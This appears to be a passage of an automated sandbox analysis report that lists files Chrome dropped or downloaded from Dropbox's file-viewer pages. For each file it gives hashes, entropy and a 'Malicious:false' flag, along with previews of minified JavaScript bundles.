                                                    Preview:define(["exports","./c_flux_dispatcher","./c_api_v2_routes_folders_info_provider"],(function(e,t,i){"use strict";const n=function(){let e=!1;const i=[];return t.dispatcherSingleton.dispatch_begin=()=>e=!0,t.dispatcherSingleton.dispatch_end=function(){e=!1;try{return Array.from(i).map((e=>e()))}finally{i.length=0}},function(t){return e?Array.from(i).includes(t)?void 0:i.push(t):t()}}();class s{constructor(e){"function"==typeof this._init&&this._init(),this._change_listeners=[],this._dispatcher=e||t.dispatcherSingleton,this.dispatchToken=this._dispatcher.register(this._new_payload_wrapper.bind(this))}destructor(){this._dispatcher.unregister(this.dispatchToken),this.remove_all_change_listeners()}emit_change(){for(const e of this._change_listeners)n(e)}add_change_listener(e){i.assert(!this._change_listeners.includes(e),"adding duplicate change listener not allowed"),this._change_listeners.push(e)}remove_change_listener(e){this._change_listeners=this._change_listeners.filter((t=>t!==e))}rem
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (7287)
                                                    Category:dropped
                                                    Size (bytes):7355
                                                    Entropy (8bit):5.224834653424017
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FF2680B1E6C2C7D0BFC7CFA80999F935
                                                    SHA1:5454B7F22D436B21302572376D1F9A25A8E185A1
                                                    SHA-256:AE084E57A83C93E521BAF02E42C0A29ECA342B262114FD4501197AE3CF771F52
                                                    SHA-512:A389A79A5B8D63EF92E7FDDD3055B959FEC5BE0275FFFD953AEF5FC6B89D8F89913416A60EB7EE4F032ADC2C8230F19C3895F7209BD88616402844ED615F854C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_core_data_ui","./c_file_viewer_hooks_usePrevious","./c_core_utils_is_text_preview_on","./c_pap-events_sign_save_signature_doc","./e_data_modules_stormcrow","./c_react-redux_hooks_useDispatch","./c_core_i18n"],(function(e,i,t,l,r,a,s,n,o,u){"use strict";function c(e){return e&&e.__esModule?e:{default:e}}var d=c(i);const w="files:get_metadata_batch",C=(e,i)=>{const{fileViewerId:l,logUserAction:r}=t.useFileViewerContext(),n=o.useDispatch();return t.useStabilizedCallback((()=>{const o={[s.INFO_BLADE_PLUGIN_ID]:t.UserAction.Info,[s.FILE_ACTIVITY_PLUGIN_ID]:t.UserAction.FileActivity};n(a.setLeftSidebarPlugin({fileViewerId:l,actionContext:i,pluginId:e})),void 0!==e&&r(o[e],i)}))},I=(e,i)=>{const{fileViewerId:l,logUserAction:r}=t.useFileViewerContext(),n=o.useDispatch();return t.useStabilizedCallback((()=>{const o={[s.TRANSCRIPT_BLADE_PLUGIN_ID]:t.UserAction.TranscriptShow,[s.COMMENTS_PLUGIN_ID]:t.UserAction.ShowComments,[
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):92
                                                    Entropy (8bit):5.384496874323631
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:546ED367269C5F28FE80B35704DD5F26
                                                    SHA1:6B7209A2C776423383EAC7B3ADC0BD59618ADFD0
                                                    SHA-256:699347B85A47BFB213490EAD34D4AF579D945166803B38EDF1CA4541CB30B0DB
                                                    SHA-512:095617D4A5FD7016D6FA77AF944956226361EF0A079FD7881BB933ECF9BDAF63DB22BDF29299C2ED66D42465883FCD4F7B158F917687EE1AC55BA9B2BED87144
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:tMDUueMFny3KqTJsz6FL7TLF6bfWWiPV/lfeTumY0XydO3So/5y0xi1PNiJDjYGWndbb/zzDeNrm+HJ87zpGtFvyeeAe
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (65340), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):106791
                                                    Entropy (8bit):5.304551905559034
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:565B0E1FA02E4AF047DBA9B057B30753
                                                    SHA1:93FC58A73F5745E6675223741E68D0ABD4FC76E0
                                                    SHA-256:17B0D3C725FAAC2A068ED069D62CA8F10ADB8DF216FB9236E530807E11DD480D
                                                    SHA-512:F28A62003372E3CE8D14AC40530A33471802DD62965A9F21E34A6AFB306CDB6787C01E28B193CDC8FB5AAC670FC07669E92C2B322EA490CDD3F2407332AF2F8E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(n){"use strict";var t="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function r(n){return n&&n.__esModule&&Object.prototype.hasOwnProperty.call(n,"default")?n.default:n}var e={exports:{}};!function(n,r){(function(){var e,u="Expected a function",o="__lodash_hash_undefined__",i="__lodash_placeholder__",a=16,f=32,c=64,l=128,s=256,v=1/0,p=9007199254740991,h=NaN,_=4294967295,g=[["ary",l],["bind",1],["bindKey",2],["curry",8],["curryRight",a],["flip",512],["partial",f],["partialRight",c],["rearg",s]],y="[object Arguments]",d="[object Array]",b="[object Boolean]",j="[object Date]",w="[object Error]",m="[object Function]",x="[object GeneratorFunction]",O="[object Map]",A="[object Number]",E="[object Object]",S="[object Promise]",z="[object RegExp]",I="[object Set]",k="[object String]",R="[object Symbol]",T="[object WeakMap]",B="[object ArrayBuffer]",U="[object DataView]",
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (11733)
                                                    Category:downloaded
                                                    Size (bytes):11813
                                                    Entropy (8bit):5.384807378838266
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7BB68F6E19A167777C7BA64E83C97FCC
                                                    SHA1:E41C1FA017B75BBEC4CC72DB06521D9A823B2688
                                                    SHA-256:EFA3539092BD202A4F3678CD9C2D4F42680D3017F1CC5E83CA9706E3688C0C09
                                                    SHA-512:37AD3AAF12B5189FDBF0987EDF0D7B7AB61A3B32DB98FDFC95B4B7BB3496C784668B760119C2FAFE84C3BF194D71E999E8AA16A0D431B72552FB38575D7B4BF8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_profile_services_profile_services_link-vfle7aPbh.js
                                                    Preview:define(["exports","./c_api_v2_routes_folders_info_provider","./e_file_viewer_static_scl_page_folder","./c_core_i18n","./c_lodash","./c_ts_utils","./c_abuse_login_and_register_constants_fetch","./e_data_modules_stormcrow"],(function(e,t,n,i,r,_,s,o){"use strict";var c;e.AuthWindowOption=void 0,(c=e.AuthWindowOption||(e.AuthWindowOption={})).HIDDEN_IFRAME="hidden_iframe",c.POP_UP="pop_up",c.REDIRECT="redirect";const a={};function l(e){const t=r.uniqueId(),n=t=>{let n;try{n=JSON.parse(t.data)}catch(e){return}n&&"db:profile_service:auth_complete"===n.type&&e(n.payload)};return window.addEventListener("message",n),a[t]=n,t}function u(e){const t=a[e];t&&(delete a[e],window.removeEventListener("message",t))}var d,p;!function(e){e[e.CONTACTS=0]="CONTACTS",e[e.PROFILE=1]="PROFILE",e[e.PHOTO=2]="PHOTO",e[e.EMAIL=3]="EMAIL",e[e.CALENDAR=4]="CALENDAR",e[e.DOCUMENTS=5]="DOCUMENTS",e[e.CHAT=6]="CHAT",e[e.READ_FILES=7]="READ_FILES",e[e.DIRECTORY_MEMBERS=8]="DIRECTORY_MEMBERS",e[e.CHAT_HISTORY_PUBLIC_
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (11993)
                                                    Category:downloaded
                                                    Size (bytes):12054
                                                    Entropy (8bit):5.371151945200646
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:82BF8ACA4F4AB5E37A7109735F3CA9DA
                                                    SHA1:7F14BE70C03C49C96E38C2F1C458D68DF0C6A329
                                                    SHA-256:10D23AB337FDAB24215CED36E773F5DCD88B01A4CCBB0505C450B820741353C1
                                                    SHA-512:40E3B3EB2856BB33C01C43472ACFB82B5507CCB1AD5E470C34B40A17386307639834F7142BF3EABA9B84B1A24E0AC191178457A386FDEFA42B3E500093A58B7A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_toolbar-vflgr-Kyk.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_core_data_ui","./c_core_utils_is_text_preview_on","./c_file_viewer_toolbar_toolbar_holder","./c_core_i18n","./c_file_viewer_hooks_usePrevious","./c_file_viewer_toolbar_toolbar_holder2","./c_file_viewer_toolbar_utils","./c_dig-icons_assets_ui-icon_line_upload","./c_file_viewer_toolbar_fullscreen_button","./c_file_viewer_components_preview_button","./c_file_viewer_hooks_use_mouse_active","./c_dig-icons_assets_ui-icon_line_zoom-out","./c_react-redux_hooks_useDispatch","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./e_core_exception","./c_lodash","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_src_sink_index","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_file_viewer_keyboard_bindings","./c_core_utils_browser_detection
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2487)
                                                    Category:downloaded
                                                    Size (bytes):2562
                                                    Entropy (8bit):5.17635605611739
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:133C55CB9985388EA47EC0D2442D00F8
                                                    SHA1:0FE8F6117D160190C4465BFB11FF66008415B781
                                                    SHA-256:B59A5BCC79B6ED6DE00496464A5FB7583091FE4660957315B221151BD4F27303
                                                    SHA-512:52E35C72F42CC43F26F94049DC307643667A7B343D36596C39458ACA26027EB28EB156D315C7EBAFB68178F4593C9E23545E800430F7931D536CC60A349F6139
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_preview_archive_utils-vflEzxVy5.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_file_viewer_api_navigation","./c_core_utils_is_text_preview_on","./e_data_modules_stormcrow","./c_react-redux_hooks_useDispatch"],(function(e,r,t,i,l,o,a){"use strict";function n(e){return e&&e.__esModule?e:{default:e}}var u=n(r);const s="file_subpath";function c(e,r){var i;return t.getClosestSubpath(e.entries,null!==(i=null==r?void 0:r.split("/").slice(1).filter(Boolean))&&void 0!==i?i:[])}const d=(e,r,t)=>{var i,l,o;return null!==(o=null===(l=null===(i=e[r])||void 0===i?void 0:i.children)||void 0===l?void 0:l.reduce(((i,l)=>{const o=`${r}/${l}`,a=t(e[o],o);return void 0!==a?[...i,a]:i}),[]))&&void 0!==o?o:[]};e.archiveSubpathQueryParam=s,e.getArchiveFiles=function(e,r,i,l){if(!e.length)return;const a={file_id:r.file_id,ns_id:r.ns_id,sj_id:r.sj_id,url:r.url};t.fetchArchiveFiles(a,e,l,i,o.queryClient)},e.getChildFilePaths=(e,r)=>d(e,r,((e,r)=>(null==e?void 0:e.isDir)?void 0:r)),e.getChildren=(e,r)=>d(e,r,(e=>e)),e.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (7664)
                                                    Category:dropped
                                                    Size (bytes):7745
                                                    Entropy (8bit):5.0659825308368625
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A644CA89B9B3AAA4EF13E2877D86F2AD
                                                    SHA1:A02B8F8BB9E8BB2C26741014995183817ADFC8AB
                                                    SHA-256:798A06D0056E689923096718957B38F1053160C0F7C194BC2AA3B1F2BA11BEF8
                                                    SHA-512:7B9FFBF6C4734846024F8C40760AE5F1E55B80554D28532257F242099C51422AFB6EF26CA9BA691390B60B83424945D452A825A68F4A807B4B98BDD65CC88DA3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(t){"use strict";var e=function(){if("undefined"!=typeof Map)return Map;function t(t,e){var n=-1;return t.some((function(t,r){return t[0]===e&&(n=r,!0)})),n}return function(){function e(){this.__entries__=[]}return Object.defineProperty(e.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),e.prototype.get=function(e){var n=t(this.__entries__,e),r=this.__entries__[n];return r&&r[1]},e.prototype.set=function(e,n){var r=t(this.__entries__,e);~r?this.__entries__[r][1]=n:this.__entries__.push([e,n])},e.prototype.delete=function(e){var n=this.__entries__,r=t(n,e);~r&&n.splice(r,1)},e.prototype.has=function(e){return!!~t(this.__entries__,e)},e.prototype.clear=function(){this.__entries__.splice(0)},e.prototype.forEach=function(t,e){void 0===e&&(e=null);for(var n=0,r=this.__entries__;n<r.length;n++){var i=r[n];t.call(e,i[1],i[0])}},e}()}(),n="undefined"!=typeof window&&"undefined"!=typeof document&&window.document===docume
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (14752)
                                                    Category:downloaded
                                                    Size (bytes):14850
                                                    Entropy (8bit):5.32649289761532
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EF151C93634533A1D91903BD5F61E0DF
                                                    SHA1:0085F2582393E258ED686D6AD4C4223D60829440
                                                    SHA-256:BA781A2665547CFE2DD73E2402EA9F691411F8133C7DD23DEF318D6A26DA5AC4
                                                    SHA-512:C6425BFF38DD273EA942DE0D3D7C73FFB50998397E3FC67E1FFF415780C4A9BE0B9EEF3AFD480727854EBD19FB475B382F98CE626C1D9C6944F981C03B252815
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_title_bar_dropdowns_titlebar_file_dropdown.after-display-vfl7xUck2.js
                                                    Preview:define(["require","exports","react","./e_file_viewer_static_scl_page_folder","./c_file_viewer_api_navigation","./c_file_viewer_components_titlebar_menu_content","./c_react_query_helpers_queries_file_content_metadata","./c_action_plugins_conversion_action_conditions","./c_action_bar_action_bar_strings","./c_action_plugins_move_action_definition","./c_dig-icons_assets_ui-icon_line_file-history","./c_action_plugins_download_action_button","./c_pap-events_sign_save_signature_doc","./c_core_i18n","./c_admin_registration_source_constants","./c_file_viewer_common_show_auth_modal","./c_flows_conversions_conversion_actions","./c_flows_conversions_utils","./c_flows_utils_auto_folder_helpers","./c_dig-icons_assets_ui-icon_line_print","./c_dig-icons_assets_ui-icon_line_zip","./c_action_plugins_open_in_action_dropdown","./c_file_viewer_hooks_usePrevious","./c_dig-icons_assets_ui-icon_line_rewind","./c_conversions_actions_unzip","./c_dig-illustrations_spot_passcode-lock","./e_edison","./c_pap-events
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (7197)
                                                    Category:dropped
                                                    Size (bytes):7268
                                                    Entropy (8bit):4.990357441553047
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:653F41E67EB66EF411FAE00BB2FDF3B4
                                                    SHA1:90EF7B2B50F5A72186E035DFB4BD64DB4D447C99
                                                    SHA-256:377BD794D81CE00D5FAE35C5EEEB305519F31970E0306E040353715235334EB2
                                                    SHA-512:244A7D2F2FFBBA48AB044C5E7E89562422C18FB1B6F5EA21822705D229E2E4633D104F783BC14D2FE73AE749F7D0C3DAD09380B942599E9EBF09E5D149BB3B85
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(e){"use strict";var t;e.Action=void 0,(t=e.Action||(e.Action={})).CloseDocSidebar="@@previews/fileViewerUi/closeDocSidebar",t.CopyToDropbox="@@previews/fileSystem/copyToDropbox",t.DownloadFile="@@previews/fileSystem/downloadFile",t.FlipToNextFile="@@previews/navigation/flipToNextFile",t.FlipToPreviousFile="@@previews/navigation/flipToPreviousFile",t.OpenDocSidebar="@@previews/fileViewerUi/openDocSidebar",t.PageDown="@@previews/pageDown",t.PageUp="@@previews/pageUp",t.UpdateDocCurrentPageIndex="@@previews/updateDocCurrentPageIndex",t.IncrementDocPasswordAttempts="@@previews/incrementDocPasswordAttempts",t.PageNavigation="@@previews/pageNavigation",t.ResolvePageNavigation="@@previews/resolvePageNavigation",t.UpdateFitScaleFactor="@@previews/updateFitScaleFactor",t.UpdateFitToWidthScaleFactor="@@previews/updateFitToWidthScaleFactor",t.UpdateZoomScaleFactor="@@previews/updateZoomScaleFactor",t.ZoomIn="@@previews/zoomIn",t.ZoomToggleOriginalOrFit="@@previews/zoo
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (682)
                                                    Category:downloaded
                                                    Size (bytes):758
                                                    Entropy (8bit):4.963001486748433
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C5A938718F3B538C16244CC69612ABB2
                                                    SHA1:D49CE13EE5F172A68C98BD767BB25E96756DC887
                                                    SHA-256:3CC5AE25A8154A635579E84A10FDE37E485339D6A7F4FAFDD057F62AC9E2D078
                                                    SHA-512:21B052505FD3E700A22159A4EC5E17AD66E9C7BE6C9FCA25A941203B1BEA33041BD94331F776FA3FCDB4B353CFBBA71481DB5EC4437BE3370F75499969F84FCE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_datatypes_sharing_account-metadata-vflxak4cY.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,i){"use strict";const m=e=>"personal"!==e.role&&!!e.is_team_member,a=(e,i)=>{var a;return m(e)&&e.team_id===(null===(a=i.owner_team)||void 0===a?void 0:a.id)};e.convertAccountMetadataToUser=e=>({id:e.user_id,email:e.email,is_team:m(e),is_team_admin:e.is_team_admin,account_id:e.account_id,team_dbtid:e.team_id,is_tmr_member:e.is_tmr_member}),e.getIsTeamAdmin=e=>m(e)&&!!e.is_team_admin,e.isFreeUnpairedNonTeamUser=e=>Boolean(e&&!e.is_paid&&!e.is_paired&&!e.is_team_member),e.isUserOnSameTeamAsObject=a,e.isUserOnSameTeamAsTmrFolder=(e,_)=>(e=>m(e)&&!!e.is_tmr_member)(e)&&a(e,_)&&i.getIsTeamSharedFolder(_)}));.//# sourceMappingURL=c_datatypes_sharing_account-metadata.js-vflskGoJs.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1370)
                                                    Category:dropped
                                                    Size (bytes):1461
                                                    Entropy (8bit):5.154944646710287
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:ACDA73DF9990990A90103295BE744C6F
                                                    SHA1:AACA83F3BE306E1DCBA9E2D6E111ECBC7A991B34
                                                    SHA-256:40E6DE13EE791FFEA0BF14A1D79A72F62B586FEF5B320F645C81C24328B6E17F
                                                    SHA-512:E9AD6743F37ED441EDD2490DCF9B0BB3E40379AB16F01D05D6CC8A78723453240A9619ABB7DE0AC25B1A87FCC587F71A62842772FBB27DA78ED84803DBB64935
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./e_data_modules_stormcrow"],(function(e,t,r,a){"use strict";function i(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var a=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,a.get?a:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var u=i(t);const n="files:get_file_content_metadata",l=e=>a.createGenericQuery({queryRouteFilter:["apiv2",n],queryFn:({apiArg:t})=>async({})=>{if(!t.file_path_or_id&&!t.url)return{apiData:void 0,pkgData:null};return{apiData:await r.GetFilesRoutes(e).rpc("get_file_content_metadata",t,{}),pkgData:null}},getQueryKey:a.getGenericQueryKey("apiv2",n)});e.fileContentMetadataPrefetch=(e,t,r)=>{if(!e.file_id)return;const a={file_path_or_id:e.file_id,url:e.url};return l(t).prefetchQuery(r,{apiArg:a,pkgArg:null})},e.useFileContentMetadataQuery=e=>{const t=r.useFileViewerContext();if(!t)th
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (9199)
                                                    Category:downloaded
                                                    Size (bytes):9271
                                                    Entropy (8bit):5.186225144551161
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E1A581AB4BDE052405C9D96B9BFDD1C7
                                                    SHA1:D5E69EA617D486B0A18CB5740FF41A0D497F03FC
                                                    SHA-256:E29BF71498F59D1E42511C333EEBD39439123AF13F1C6BD38A68E5447015B188
                                                    SHA-512:4B43C85685F5F90CFF16C8E87BC7A48BD44867A6F95F7AAE63E9DD2960B484433252B2AC2FB108B44535DDCEF23A6E40E970AE718317CC37D0062431B996E290
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_files_view_file_actions_api_v2-vfl4aWBq0.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./e_core_exception"],(function(r,e,t){"use strict";const o=1e3,a="file_actions_client_error",i=r=>({isError:!0,error:{".tag":"undefined_error"},error_summary:"undefined_error",jobId:r}),n=(r,o)=>{var i,n;t.reportStack(JSON.stringify(null!==(n=null===(i=e.filterApiError(o))||void 0===i?void 0:i.error)&&void 0!==n?n:o),{severity:t.SEVERITY.NON_CRITICAL,silent:!0,tags:[a,`${a}_${r}`]})};function s(r){return Boolean("fq_path"in r?r:null)}function l(r){return s(r)?e.filename(r.fq_path):r.name}async function c(r,t,o,a){const i=e.parent_dir(r),n=e.normalize(i)+"/"+t,s=new e.DefaultUserApiV2Client(o),{checkFSWs:l}=a;try{const t=await e.GetFilesRoutes(s).rpc("move_v2",{from_path:r,to_path:n,autorename:!0,allow_ownership_transfer:!1,fsw_request:l?{".tag":"check"}:void 0},{});return{isError:!1,result:{changeset_data:t.changeset_data,entries:[{".tag":"success",success:t.metadata}]}}}catch(r){return h(r)}}const u=(r,t,o,a)=>()=>e.GetFilesR
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (576)
                                                    Category:dropped
                                                    Size (bytes):633
                                                    Entropy (8bit):5.173451626073833
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:15B3A9E5335A4F4D27EBF04E46BF36C2
                                                    SHA1:7ED83A908ACAC43B09E64223FA32FE12449CFF90
                                                    SHA-256:657328D60165984A6C86E01721E402ECD14AD1FA6BCD04B4F2527966CE92D3B4
                                                    SHA-512:52CDC802C1117A8C72CB05391E06D4B997DAAAC46DA736063DF1CB533185685BBE5A17335FA2B6BFECC4272CCEFC420E43B849A0D67C009290242FF24CC11325
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_pnm_utils","./c_browse_models","./c_onboarding_survey_lib_oa_pulsar_campaigns"],(function(e,a,_,i,n){"use strict";a.NameSpaceAccess.ACCESS_NO_ACCESS,a.NameSpaceAccess.ACCESS_READER,a.NameSpaceAccess.ACCESS_READER_NO_COMMENT,e.getFilename=e=>"fq_path"in e||(e=>e instanceof i.File)(e)?_.hasValidLinkNode(e.per_node_metadata)||_.shouldHideExtension(e.per_node_metadata)?a.filename_without_extension(a.filename(e.fq_path)):e.legacyPaperName?e.legacyPaperName:a.filename(e.fq_path?e.fq_path:e.ns_path):e.filename}));.//# sourceMappingURL=c_files_view_util.js-vfl3CKL36.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1087)
                                                    Category:dropped
                                                    Size (bytes):1156
                                                    Entropy (8bit):5.229514916479648
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DED932BDD63FE2154F93E62BA3C0D428
                                                    SHA1:639F4E7C785E0702FB383C7EEDA6376D86B0A649
                                                    SHA-256:F1BD5486AD300B272A206FD0C14594B840DE7C4A7FA967800E670FEA02B94822
                                                    SHA-512:DBEA2EE4C330877D184431129CBDF724BEF35EFC347BF46C0D781CBC9F57C4D2EF3850C51A0216EE860BBF023BCDCC62D352E20B84A0C9C379E13C30EE36DF39
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,r){"use strict";r.injectInternalStyle("/static/js/file_viewer/preview_archive/preview_archive.module.out-vflR1JQ33.css",(e=>"._emptyFolder_g0xx2_1{align-items:center;display:flex;flex-direction:column;height:100%;justify-content:center}._folderTable_g0xx2_9{background:var(--dig-color__background__base);overflow-y:auto;padding:var(--dig-spacing__macro__medium)}._archiveFileBreadcrumb_g0xx2_15{flex-grow:1;height:100%;justify-content:center}._extractAllButtonBar_g0xx2_21{margin:20px}._titlebarV2Breadcrumbs_g0xx2_25 ._archiveFileBreadcrumb_g0xx2_15 ._breadCrumbText_g0xx2_25{font-family:var(--type__body__standard--fontfamily);font-size:14px}._titlebarV2Breadcrumbs_g0xx2_25{min-width:0}._truncateText_g0xx2_35{overflow:hidden;text-decoration:none;text-overflow:ellipsis;white-space:nowrap}"));e.archiveFileBreadcrumb="_archiveFileBreadcrumb_g0xx2_15",e.breadCrumbText="_breadCrumbText_g0xx2_25",e.emptyFolder="_emptyFolder_g0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1846)
                                                    Category:dropped
                                                    Size (bytes):1916
                                                    Entropy (8bit):5.304676783939444
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1D25802322665073AF39A632A9E08B9C
                                                    SHA1:265881BD89AE7E88E568569AB7AFEE1797D1919A
                                                    SHA-256:F57943116720002B8F64CB4BEECBDE85E7A65464836422459C3829CCB373C537
                                                    SHA-512:86D52A0E0E4A327705C79C26D1F91166CE2319C5896ABEBA3C13BC3755791A3923C9407BB6F15568F7B81F2F4180777846BAA36E3305065543E5ACD8B9775645
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(_){"use strict";var e;_.EmailVerificationReasons=void 0,(e=_.EmailVerificationReasons||(_.EmailVerificationReasons={})).SHARE_FOLDER="share_folder",e.CREATE_API_APP="create_api_app",e.PUBLIC_FOLDER="public_folder",e.GENERIC="generic",e.SHMODAL="shmodal",e.SHARE_FILEVIEWER="share_fileviewer",e.MOBILE_SHARE_FOLDER="mobile_share_folder",e.EMAIL_ALIAS="email_alias",e.CHANGE_EMAIL="change_email",e.PROMPT_CAMPAIGN="prompt_campaign",e.ADD_COMMENT="add_comment",e.SUBSCRIBE_TO_COMMENTS="subscribe_to_comments",e.CREATE_FILE_COLLECTOR="create_file_collector",e.JOIN_DISCOVERED_TEAM="join_discovery",e.CREATE_TEAM="create_team",e.NEW_DFB_TEAM_TRY="new_dfb_team_try",e.NEW_DFB_TEAM_BUY="new_dfb_team_buy",e.GIFT_BUY="gift_buy",e.REFER_FRIENDS="refer_friends",e.UJ_VERIFY_EMAIL="uj_verify_email",e.SHOWCASE_USER="showcase_user",e.CLOUD_DOCS="cloud_docs",e.REVERIFICATION_CAMPAIGN="reverification_campaign",e.CHANGE_EMAIL_FOR_APPLE_SIGNUP="change_email_for_apple_signup",e.SUSPICI
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1032)
                                                    Category:downloaded
                                                    Size (bytes):1100
                                                    Entropy (8bit):5.223377937628606
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2EF8395F0973451B10302B2A921FCA7D
                                                    SHA1:C0140AF9694AC196CFD0C281CDBEDCBD2F998AF8
                                                    SHA-256:DD9E7D7CC314CEF643466EC1D398DE48289DD741B24EEBCE3A41F1179531C447
                                                    SHA-512:4A7AEE89ACF401008442E6355807216AE3E2D2A0B1B61DE8584E061E640863DBB53DC8BDC48BAF72F3E038E24AFFD64A50522B659B718C144D512253B9140A63
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_components_sharing_spinner-vflLvg5Xw.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react"],(function(e,t,r){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var i=n(r);const s="scl-sharing-spinner";class a extends i.Component{render(){const{ariaValue:e,iconSize:r,textSize:n,style:a,message:c,className:l}=this.props,o=t.cx(`${s}__text`,l);return i.createElement(t.Text,{size:"standard"===n?"medium":n,isBold:!0,style:a},i.createElement(t.Spinner,{"aria-valuetext":e,size:r,className:`${s}__icon`}),c&&i.createElement("span",{className:o},c))}}a.displayName="SharingSpinner",a.defaultProps={iconSize:"xsmall"},e.SharingSpinner=a,e.isFilePreviewSupported=e=>{const r=t.getFileExtension(e);if(".indd"===r)return!1;return t.DEFAULT_SUPPORTED_PREVIEW_TYPES.includes(t.resolveP
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (654)
                                                    Category:downloaded
                                                    Size (bytes):1036
                                                    Entropy (8bit):5.323296704358444
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:80CCDE85B980E138C0AAF5AB227EF54B
                                                    SHA1:534A8883BD9582295FC2B867215944D66F1837E7
